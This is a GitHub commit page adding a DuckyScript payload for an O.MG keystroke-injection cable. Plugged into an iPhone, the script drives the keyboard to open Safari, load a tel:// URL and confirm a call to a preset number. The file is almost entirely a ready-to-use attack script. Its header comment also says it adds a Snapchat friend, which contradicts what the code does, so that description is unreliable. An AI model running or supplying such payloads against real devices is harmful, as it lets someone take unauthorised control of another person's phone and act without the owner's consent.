Create iOS Call Phone Number

pull/204/head
Peaks 2023-08-27 21:23:06 -04:00 committed by GitHub
parent 40753fea2e
commit 36b1a7bb45
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 52 additions and 0 deletions

52
iOS Call Phone Number Normal file
View File

@ -0,0 +1,52 @@
REM Version 1.0
REM OS: iOS
REM Author: Peaakss / Peaks
REM -----------------------------------------------
REM READ THIS BEFORE USING PAYLOAD
REM Description: This payload uses a URL scheme to quickly navigate to a user profile on snapchat and add them as a friend
REM NOTICE Payload was made on iOS 16.4 - iPhone | Timing may have have to be changed based on version/model
REM NOTICE Lighting to USB-A or USB-C camera adapter is needed to run this payload, active end of the O.MG cable must be plugged into the end of the adapter, the lighting end is displayed on the sales page before purchasing the O.MG cable, a adapter is needed because there is no lightning active end
REM NOTICE This payload needs Full Keyboard Access to enabled on the device
REM NOTICE Make sure to change "Phone Number" with the number you wish to call.
REM -----------------------------------------------
DEFINE #NUMBER "Phone Number"
DEFINE #URL tel://#NUMBER
FUNCTION MAIN()
DELAY 1000
GUI h
DELAY 250
GUI h
DELAY 500
GUI SPACE
DELAY 1500
STRING Safari
DELAY 1000
ENTER
DELAY 500
GUI n
DELAY 500
GUI l
DELAY 250
STRING #URL
DELAY 2000
ENTER
DELAY 1500
TAB
DELAY 500
UPARROW
DELAY 250
SPACE
END_FUNCTION
MAIN()